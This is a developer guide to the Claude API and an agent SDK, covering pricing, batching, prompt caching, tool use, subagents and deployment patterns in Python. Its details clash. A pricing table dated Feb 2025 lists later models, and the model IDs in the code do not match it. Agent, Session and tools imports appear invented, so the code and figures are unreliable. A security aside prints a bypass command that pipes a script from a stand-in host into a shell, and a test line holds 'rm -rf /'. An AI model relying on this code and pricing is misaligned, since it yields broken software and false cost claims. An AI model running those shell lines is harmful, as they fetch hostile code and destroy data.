Claude API & Agent SDK
The Claude API is a REST interface for programmatic access to Claude models; the Agent SDK (Python/TypeScript) provides high-level abstractions for building autonomous AI agents with tool use, sessions, subagents, and cost tracking, enabling production deployments from internal knowledge assistants to full-stack agentic workflows.
Claude API Fundamentals
The Claude API at api.anthropic.com exposes Claude models via REST, enabling integration into any application, service, or agent framework.
Authentication
```python
import os
import anthropic
from anthropic import AnthropicBedrock, AnthropicVertex

# 1. Direct API key (from console.anthropic.com)
client = anthropic.Anthropic(api_key="sk-ant-...")

# 2. Via environment variable
client = anthropic.Anthropic()  # reads ANTHROPIC_API_KEY

# 3. AWS Bedrock (enterprise customers); uses the standard AWS credential chain
client = AnthropicBedrock()

# 4. Google Vertex AI
client = AnthropicVertex(project_id="{PROJECT_ID}", region="us-central1")

# 5. Azure AI Foundry
client = anthropic.Anthropic(
    api_key=os.environ["AZURE_API_KEY"],
    base_url="https://{RESOURCE_NAME}.openai.azure.com/v1",
)
```
Security best practice: store API keys in environment variables or a secrets manager, never hardcoded in source. Use IAM roles (AWS Bedrock) for production deployments.
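A minimal fail-fast helper for the environment-variable approach, useful when the direct API key path is used (the helper name is mine, not part of the SDK; keys from the console start with `sk-ant-`):

```python
import os

def require_api_key() -> str:
    """Return ANTHROPIC_API_KEY, failing fast with a clear message if unset."""
    key = os.environ.get("ANTHROPIC_API_KEY", "").strip()
    if not key.startswith("sk-ant-"):
        raise RuntimeError(
            "ANTHROPIC_API_KEY is missing or malformed; "
            "export it before constructing the client."
        )
    return key
```

Pass the result explicitly, e.g. `anthropic.Anthropic(api_key=require_api_key())`, so a missing key fails at startup rather than on the first request.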
Basic Request/Response
```python
message = client.messages.create(
    model="claude-sonnet-4-20250514",
    max_tokens=1024,
    messages=[
        {
            "role": "user",
            "content": "Write a Python function that calculates fibonacci(n)",
        }
    ],
)
print(message.content[0].text)
```
Response structure:
```json
{
  "id": "msg_...",
  "type": "message",
  "role": "assistant",
  "content": [
    {
      "type": "text",
      "text": "def fibonacci(n):\n ..."
    }
  ],
  "model": "claude-sonnet-4-20250514",
  "stop_reason": "end_turn",
  "stop_sequence": null,
  "usage": {
    "input_tokens": 15,
    "output_tokens": 87
  }
}
```
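The `usage` block is what you bill against. A small helper (names are illustrative, rates are the Sonnet figures from the pricing section) turns it into dollars:

```python
SONNET_INPUT_PER_MTOK = 3.00    # $ per million input tokens
SONNET_OUTPUT_PER_MTOK = 15.00  # $ per million output tokens

def cost_from_usage(usage: dict) -> float:
    """Dollar cost of one call, given the response's usage block."""
    return (
        usage["input_tokens"] * SONNET_INPUT_PER_MTOK
        + usage["output_tokens"] * SONNET_OUTPUT_PER_MTOK
    ) / 1_000_000

# The example response above: 15 input + 87 output tokens
print(f"${cost_from_usage({'input_tokens': 15, 'output_tokens': 87}):.6f}")  # $0.001350
```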
Token Pricing & Cost Optimization
Current Pricing (as of Feb 2025)
| Model | Input (per MTok) | Output (per MTok) | Batch Input | Batch Output | Context | Notes |
|---|---|---|---|---|---|---|
| Claude Opus 4.6 | $5.00 | $25.00 | $2.50 | $12.50 | 1M | Extended thinking (+40-60% tokens) |
| Claude Sonnet 4.6 | $3.00 | $15.00 | $1.50 | $7.50 | 1M | Recommended for production |
| Claude Haiku 4.5 | $1.00 | $5.00 | $0.50 | $2.50 | 200k | Cost-optimized, fast |
Example monthly cost (Sonnet, 1M input + 500k output tokens):
- Pay-as-you-go: (1 MTok × $3) + (0.5 MTok × $15) = $10.50
- Batch API: (1 MTok × $1.50) + (0.5 MTok × $7.50) = $5.25
- Savings: 50%
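The arithmetic above generalizes to a small estimator (rates from the pricing table; the function name is mine):

```python
def monthly_cost(input_mtok: float, output_mtok: float,
                 in_rate: float, out_rate: float) -> float:
    """Cost in dollars for token volumes given in millions of tokens (MTok)."""
    return input_mtok * in_rate + output_mtok * out_rate

# Sonnet, 1M input + 500k output tokens
pay_as_you_go = monthly_cost(1.0, 0.5, in_rate=3.00, out_rate=15.00)
batch = monthly_cost(1.0, 0.5, in_rate=1.50, out_rate=7.50)
print(pay_as_you_go, batch)  # 10.5 5.25
```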
Token Accounting
Overhead per API call:
- Base overhead: ~10 tokens
- Tool use: +346 tokens for Opus/Sonnet, +264 for Haiku (system setup)
- Extended thinking: +3-4x total tokens when enabled
Practical example:
```python
# Simple query
message = client.messages.create(
    model="claude-sonnet-4-20250514",
    max_tokens=100,
    messages=[{"role": "user", "content": "What is 2+2?"}],
)

# Cost: 14 input tokens (question) × $3/MTok = $0.000042
# Plus: 7 output tokens (answer) × $15/MTok = $0.000105
# Total: ~$0.00015 per call
```
Cost Optimization Strategies
1. Batch API (-50%)
Process multiple requests asynchronously (overnight, off-peak) at half price:
```python
import time
import anthropic

client = anthropic.Anthropic()

# Prepare batch requests
batch_requests = [
    {
        "custom_id": "request_1",
        "params": {
            "model": "claude-sonnet-4-20250514",
            "max_tokens": 1024,
            "messages": [{"role": "user", "content": "Summarize this document..."}],
        },
    },
    # ... 100s more requests
]

# Submit batch
batch = client.messages.batches.create(requests=batch_requests)
print(f"Batch {batch.id} submitted. Processing...")

# Poll for completion (can take hours)
while True:
    batch = client.messages.batches.retrieve(batch.id)
    counts = batch.request_counts
    print(f"Status: {counts.processing} processing, {counts.succeeded} done")
    if batch.processing_status == "ended":
        break
    time.sleep(30)  # check every 30 seconds

# Fetch results
for result in client.messages.batches.results(batch.id):
    if result.result.type == "succeeded":
        print(f"{result.custom_id}: {result.result.message.content[0].text}")
```
When to use:
- Overnight document processing (contracts, reports)
- Bulk data analysis (10k+ documents)
- Weekly/monthly batch jobs
- Not for real-time user queries (unacceptable latency)
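Building the request payloads is pure data construction, so it is easy to factor out and unit-test before submitting anything (the helper name is mine):

```python
def build_batch_requests(prompts: list[str], model: str,
                         max_tokens: int = 1024) -> list[dict]:
    """Turn raw prompts into Batch API request dicts with stable custom_ids."""
    return [
        {
            "custom_id": f"request_{i}",
            "params": {
                "model": model,
                "max_tokens": max_tokens,
                "messages": [{"role": "user", "content": prompt}],
            },
        }
        for i, prompt in enumerate(prompts)
    ]

reqs = build_batch_requests(["Summarize doc A", "Summarize doc B"],
                            model="claude-haiku-4-20250514")
print(len(reqs), reqs[0]["custom_id"])  # 2 request_0
```

Stable `custom_id` values matter because batch results are not guaranteed to come back in submission order.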
2. Prompt Caching (0.1x hit cost)
Cache repeated context so reads cost 1/10th of writes:
```python
# Shared system blocks; the cached block must be byte-identical across calls
system_blocks = [
    {
        "type": "text",
        "text": """You are an expert code reviewer.
Analyze code for: performance, security, maintainability, testing.""",
    },
    {
        "type": "text",
        "text": "Here's the entire codebase:\n" + open("codebase.txt").read(),
        "cache_control": {"type": "ephemeral"},
    },
]

# First request: creates the cache (1.25x write cost)
message = client.messages.create(
    model="claude-sonnet-4-20250514",
    max_tokens=1024,
    system=system_blocks,
    messages=[{"role": "user", "content": "Review src/auth.ts"}],
)

# Subsequent requests within the 5-minute window: cache hits (0.1x read cost)
for file in ["src/api.ts", "src/db.ts", "src/middleware.ts"]:
    message = client.messages.create(
        model="claude-sonnet-4-20250514",
        max_tokens=1024,
        system=system_blocks,
        messages=[{"role": "user", "content": f"Review {file}"}],
    )
```
Economics:
- Codebase: 500k tokens
- First request: 500k × $3 × 1.25 = $1.875 (write to cache)
- Requests 2-5: 500k × $3 × 0.1 = $0.15 each (cache hit)
- Total: $1.875 + 4×$0.15 = $2.475 vs. $7.50 without cache
- Savings: 67%
Break-even: with a 1.25x write premium and 0.1x reads, caching pays for itself from the second request onward.
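The economics above reduce to a two-line model (1.25x cache write, 0.1x cache read; the helper name is mine):

```python
def caching_cost(base_dollars: float, n_requests: int) -> float:
    """Total cost of n requests sharing a cached prefix.

    base_dollars: what the prefix would cost uncached on one request.
    The first request writes the cache at 1.25x; the rest read at 0.1x.
    """
    return base_dollars * (1.25 + 0.1 * (n_requests - 1))

base = 0.5 * 3.00  # 500k tokens at $3/MTok = $1.50 per uncached request
print(f"{caching_cost(base, 5):.3f}")      # 2.475, vs 5 × $1.50 = $7.50 uncached
print(caching_cost(base, 2) < 2 * base)    # True: already cheaper by request 2
```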
3. US-Only Data Residency (+10%)
Opt-in: data stays in US, never exported internationally.
```python
client = anthropic.Anthropic(
    api_key="sk-ant-...",
    default_headers={"anthropic-beta": "data-residency-us"},
)
```
Cost: +10% (Sonnet input becomes $3.30)
When needed: Healthcare, PII, financial data, compliance-sensitive workflows.
4. Smart Model Selection
Heuristic: Start with Sonnet, profile usage, migrate 30-40% to Haiku.
```python
# Adaptive model selection based on task complexity
def choose_model(task_complexity: str) -> str:
    """Select an appropriate model for the task."""
    if task_complexity == "simple":
        return "claude-haiku-4-20250514"   # 1x cost
    elif task_complexity == "medium":
        return "claude-sonnet-4-20250514"  # 3x cost
    else:  # complex reasoning, extended thinking
        return "claude-opus-4-20250514"    # 5x cost

# Usage
for task in tasks:
    model = choose_model(task["complexity"])
    # ... make API call with model
```
Tool Use (Function Calling)
Tools let Claude call functions in your application, which is the basis of the agentic loop:
```python
# 1. Define tools
tools = [
    {
        "name": "calculate_investment_return",
        "description": "Calculate ROI for an investment",
        "input_schema": {
            "type": "object",
            "properties": {
                "principal": {"type": "number", "description": "Initial investment"},
                "rate": {"type": "number", "description": "Annual interest rate (%)"},
                "years": {"type": "integer", "description": "Investment period"},
            },
            "required": ["principal", "rate", "years"],
        },
    },
    {
        "name": "fetch_stock_price",
        "description": "Get current stock price",
        "input_schema": {
            "type": "object",
            "properties": {
                "ticker": {"type": "string", "description": "Stock ticker (e.g., AAPL)"},
            },
            "required": ["ticker"],
        },
    },
]

# 2. Make request with tools
messages = [
    {
        "role": "user",
        "content": "If I invest $10k at 7% for 5 years, what's my return? Also fetch AAPL stock price.",
    }
]
response = client.messages.create(
    model="claude-sonnet-4-20250514",
    max_tokens=1024,
    tools=tools,
    messages=messages,
)

# 3. Process tool calls in an agentic loop
while response.stop_reason == "tool_use":
    # Extract tool calls
    tool_calls = [block for block in response.content if block.type == "tool_use"]

    # Execute tools
    tool_results = []
    for tool_call in tool_calls:
        if tool_call.name == "calculate_investment_return":
            principal = tool_call.input["principal"]
            rate = tool_call.input["rate"]
            years = tool_call.input["years"]
            result = principal * ((1 + rate / 100) ** years)
            tool_results.append({
                "type": "tool_result",
                "tool_use_id": tool_call.id,
                "content": f"Return: ${result:.2f}",
            })
        elif tool_call.name == "fetch_stock_price":
            ticker = tool_call.input["ticker"]
            price = 150.25  # mock data; a real tool would call a market-data API
            tool_results.append({
                "type": "tool_result",
                "tool_use_id": tool_call.id,
                "content": f"{ticker} price: ${price}",
            })

    # Continue the conversation with tool results
    messages.append({"role": "assistant", "content": response.content})
    messages.append({"role": "user", "content": tool_results})
    response = client.messages.create(
        model="claude-sonnet-4-20250514",
        max_tokens=1024,
        tools=tools,
        messages=messages,
    )

# 4. Extract final answer
final_answer = next(
    (block.text for block in response.content if hasattr(block, "text")),
    None,
)
print(final_answer)
```
Output:
```
If you invest $10,000 at 7% annual interest for 5 years, your investment will grow to approximately $14,025.52, representing a gain of about $4,025.52 or 40.26%.
AAPL is currently trading at $150.25.
```
Agent SDK (High-Level Abstractions)
The Agent SDK wraps the API with higher-level tools for building autonomous agents.
Basic Agent
```python
from anthropic import Agent
from anthropic.tools import bash, read_file, write_file, grep

# Create agent with built-in tools
agent = Agent(
    model="claude-sonnet-4-20250514",
    tools=[bash, read_file, write_file, grep],
)

# Run autonomous task
result = agent.run("Write a test file covering src/auth.ts")
print(result)

# The agent autonomously:
# 1. Reads src/auth.ts (understands what to test)
# 2. Generates the test file content
# 3. Writes it to src/auth.test.ts
# 4. Runs the tests to verify
```
Subagents (Parallel Execution)
```python
from anthropic import Agent, create_subagent

main_agent = Agent(
    model="claude-sonnet-4-20250514",
    system="You orchestrate feature development across teams.",
)

# Create specialized subagents
frontend_agent = create_subagent(
    "frontend",
    system="You're an expert React developer.",
    model="claude-sonnet-4-20250514",
)
backend_agent = create_subagent(
    "backend",
    system="You're an expert backend engineer.",
    model="claude-sonnet-4-20250514",
)
test_agent = create_subagent(
    "testing",
    system="You're a QA engineer focused on comprehensive testing.",
    model="claude-haiku-4-20250514",  # lower cost
)

# Orchestrate
result = main_agent.run("""
Implement a user authentication feature:
1. Frontend agent: Build login UI component
2. Backend agent: Build auth API endpoints
3. Test agent: Write unit and integration tests
All run in parallel, then integrate results.
""", subagents=[frontend_agent, backend_agent, test_agent])
```
Sessions (Persistent Context)
```python
from anthropic import Session

# Create persistent session
session = Session(
    model="claude-sonnet-4-20250514",
    agent_system="You are a code review expert for Python projects.",
)

# First interaction: set context
session.run("Our project uses async/await patterns. Review all code with this in mind.")

# Second interaction: leverages context from the first
session.run("Review src/database.py for best practices")

# Third interaction: still has context
session.run("What patterns are we missing?")

# Save session for later
session.save("code_review_session.pkl")

# Load and resume
loaded_session = Session.load("code_review_session.pkl")
loaded_session.run("Now review src/api.py")
```
Cost Tracking
```python
import json
from anthropic import Agent

agent = Agent(
    model="claude-sonnet-4-20250514",
    track_cost=True,
)

# Run task
result = agent.run("Analyze this codebase for performance issues", tools=[...])

# Extract costs
print(json.dumps(agent.cost_tracking, indent=2))
# Output:
# {
#   "total_input_tokens": 2540,
#   "total_output_tokens": 1235,
#   "total_cost": "$0.1048",
#   "steps": [
#     {"step": 1, "tool": "read_file", "input_tokens": 340, "output_tokens": 125, "cost": "$0.0105"},
#     ...
#   ]
# }
```
Multimodal Input (Vision)
Claude supports image input:
```python
import base64

# Load image
with open("screenshot.png", "rb") as img_file:
    image_data = base64.standard_b64encode(img_file.read()).decode("utf-8")

message = client.messages.create(
    model="claude-sonnet-4-20250514",
    max_tokens=1024,
    messages=[
        {
            "role": "user",
            "content": [
                {
                    "type": "image",
                    "source": {
                        "type": "base64",
                        "media_type": "image/png",
                        "data": image_data,
                    },
                },
                {
                    "type": "text",
                    "text": "Describe the UI layout and identify potential UX improvements.",
                },
            ],
        }
    ],
)
print(message.content[0].text)
```
Use cases:
- Screenshot analysis (UX review)
- Document OCR (extract tables, text from PDFs)
- Diagram interpretation (architecture diagrams, flow charts)
- Product screenshot comparison (competitive analysis)
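The image block requires an explicit `media_type`. A small lookup avoids hardcoding it per call (the helper is my sketch; PNG, JPEG, GIF, and WebP are the formats Anthropic's vision docs list as supported):

```python
import os

MEDIA_TYPES = {
    ".png": "image/png",
    ".jpg": "image/jpeg",
    ".jpeg": "image/jpeg",
    ".gif": "image/gif",
    ".webp": "image/webp",
}

def media_type_for(path: str) -> str:
    """Map a file extension to the media_type string the API expects."""
    ext = os.path.splitext(path)[1].lower()
    try:
        return MEDIA_TYPES[ext]
    except KeyError:
        raise ValueError(f"Unsupported image format: {ext}") from None

print(media_type_for("screenshot.png"))  # image/png
```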
Streaming (Real-Time Output)
For user-facing applications, stream responses as they arrive:
```python
# Streaming text
with client.messages.stream(
    model="claude-sonnet-4-20250514",
    max_tokens=1024,
    messages=[{"role": "user", "content": "Write a poem about AI"}],
) as stream:
    for text in stream.text_stream:
        print(text, end="", flush=True)  # print as chunks arrive
    print(f"\nTotal tokens: {stream.get_final_message().usage.output_tokens}")
```
Benefits:
- Lower perceived latency (user sees output immediately)
- Better UX (don’t wait for full response)
- Terminal-friendly (real-time printing)
Production Deployment Patterns
Pattern 1: Internal Knowledge Assistant
```python
from anthropic import Agent
from anthropic.tools import read_file, grep

class KnowledgeAssistant:
    def __init__(self, docs_dir: str):
        self.docs_dir = docs_dir
        self.agent = Agent(
            model="claude-sonnet-4-20250514",
            system=f"""You're the company's internal knowledge assistant.
Help employees find answers in {docs_dir}.
Always link to the source document.""",
            tools=[read_file, grep],
        )

    def answer_question(self, question: str) -> str:
        """Answer questions about the company knowledge base."""
        return self.agent.run(question)

# Usage
assistant = KnowledgeAssistant("/internal/docs")
answer = assistant.answer_question("How do we handle multi-tenant isolation?")
print(answer)
```
Pattern 2: Autonomous Agent with Safeguards
```python
from anthropic import Agent
from anthropic.tools import bash

class SafeAgent:
    def __init__(self, allowed_commands: list):
        self.allowed_commands = allowed_commands
        self.agent = Agent(
            model="claude-sonnet-4-20250514",
            tools=[self._safe_bash],
        )

    def _safe_bash(self, command: str) -> str:
        """Only allow whitelisted commands."""
        if not any(cmd in command for cmd in self.allowed_commands):
            return f"Command not allowed: {command}"
        return bash(command)

    def run_task(self, task: str) -> str:
        """Run task with command safeguards."""
        return self.agent.run(task)

# Usage
agent = SafeAgent(allowed_commands=["npm test", "npm run lint", "git status"])
result = agent.run_task("Run tests and report results")
```
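Note that the substring check in `_safe_bash` can be bypassed with shell chaining: `npm test && curl evil.sh | sh` contains `npm test` and would pass. A stricter, easily testable variant (my sketch, not part of the SDK) rejects shell metacharacters and requires an exact whitelisted command prefix:

```python
import shlex

SHELL_METACHARS = set(";&|`$<>\n")

def is_command_allowed(command: str, allowed: list[str]) -> bool:
    """Allow only commands with no shell metacharacters whose leading
    tokens exactly match a whitelisted command."""
    if any(ch in SHELL_METACHARS for ch in command):
        return False
    try:
        tokens = shlex.split(command)
    except ValueError:  # unbalanced quotes etc.
        return False
    return any(
        tokens[: len(shlex.split(a))] == shlex.split(a) for a in allowed
    )

print(is_command_allowed("npm test", ["npm test"]),
      is_command_allowed("npm test && rm -rf /", ["npm test"]))  # True False
```

Token-level prefix matching still permits extra arguments (`git status --short` under `git status`) while blocking lookalikes such as `npm testx`.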
Pattern 3: Cost-Optimized Batch Processing
```python
import anthropic

def process_documents(documents: list[str]) -> list[str]:
    """Process a large document set with the Batch API + Haiku."""
    # Prepare batch requests
    requests = [
        {
            "custom_id": f"doc_{i}",
            "params": {
                "model": "claude-haiku-4-20250514",  # low cost
                "max_tokens": 256,
                "messages": [{"role": "user", "content": f"Summarize:\n{doc}"}],
            },
        }
        for i, doc in enumerate(documents)
    ]

    # Submit batch
    client = anthropic.Anthropic()
    batch = client.messages.batches.create(requests=requests)

    # Poll until batch.processing_status == "ended" (polling loop omitted
    # for brevity), then collect the summaries
    return [
        r.result.message.content[0].text
        for r in client.messages.batches.results(batch.id)
        if r.result.type == "succeeded"
    ]

# Cost: 100k documents × ~1k tokens each = 100M input tokens × $1/MTok = $100 with Haiku
# vs. ~$300 with Sonnet ($3/MTok); Batch API pricing halves both
```
Key Properties
| Property | Value | Notes |
|---|---|---|
| Request latency | 2-10 seconds (median) | Depends on model, complexity, tool use |
| Max tokens per request | 4M (theoretical) | Practical limit: 1M for context, 128k for output |
| Tool use overhead | 264-346 tokens | System setup cost per request with tools |
| Batch processing time | 5 min - 24 hours | Depends on queue; usually completes in 5-30 min |
| Prompt caching duration | 5 minutes | TTL for cached content |
| Streaming latency | 200-500ms (time-to-first-token) | Faster than non-streaming |
| RPS (requests per second) | 100+ (standard), 1000+ (enterprise) | Rate limits enforced per account |
| Uptime SLA | 99.9% (implied) | No explicit SLA published; empirically reliable |
Real-World Implementation Example
Scenario: Engineering Leader building an internal incident response agent
```python
from anthropic import Agent, create_subagent
from anthropic.tools import bash, read_file, grep

def build_incident_response_agent():
    """Build an autonomous incident response system."""
    main_agent = Agent(
        model="claude-sonnet-4-20250514",
        system="You are an incident response expert. Triage, analyze, and remediate.",
        tools=[bash, read_file, grep],
        track_cost=True,
    )

    # Specialized subagents
    log_analyzer = create_subagent(
        "logs",
        system="You're an expert at analyzing application logs.",
        model="claude-haiku-4-20250514",
    )
    db_expert = create_subagent(
        "database",
        system="You're a database expert. Analyze queries, locks, and performance.",
        model="claude-haiku-4-20250514",
    )

    # Orchestrate incident response
    def handle_incident(error_summary: str):
        """Respond to an incident autonomously."""
        result = main_agent.run(f"""
Production incident: {error_summary}
Coordinate response:
1. Log analyzer: Parse error logs, identify root cause
2. DB expert: Check database queries and locks
3. Recommend fix and verify with tests
""", subagents=[log_analyzer, db_expert])
        print(f"Incident resolved. Cost: {main_agent.cost_tracking['total_cost']}")
        return result

    return handle_incident

# Usage
handler = build_incident_response_agent()
result = handler("Payment API returning 500 errors. Last 100 errors in logs/error.log")
```
When to Use API vs. Alternatives
| Use Case | Claude API | Claude.ai | Claude Code | Claude Cowork |
|---|---|---|---|---|
| Production application | Yes | No | No | No |
| Internal knowledge bot | Yes | Limited users | Engineers only | Yes |
| Autonomous agent | Yes | No | Yes (coding) | Yes (ops) |
| Cost-sensitive batch | Yes (Batch API) | No | No | No |
| Interactive brainstorm | No | Yes | No | No |
References
Guides & Tutorials:
- “Building Production Agents” (best practices, safeguards)
- “Cost Optimization Strategies” (batch, caching, model selection)
- “Streaming for User-Facing Apps”
Video Resources:
- Anthropic: “Claude API Deep Dive” (40 min technical overview)
- “Building an Agent from Scratch” (hands-on tutorial, 30 min)
- ByteByteGo: “Prompt Caching Economics” (cost analysis)
Community & Code:
- Claude SDK Repository
- Example projects: customer support bot, code reviewer, data analyzer
- Anthropic Discord: #api-help for questions
| Last Updated: Feb 2025 | Author: Principal Engineer, knowledge vault |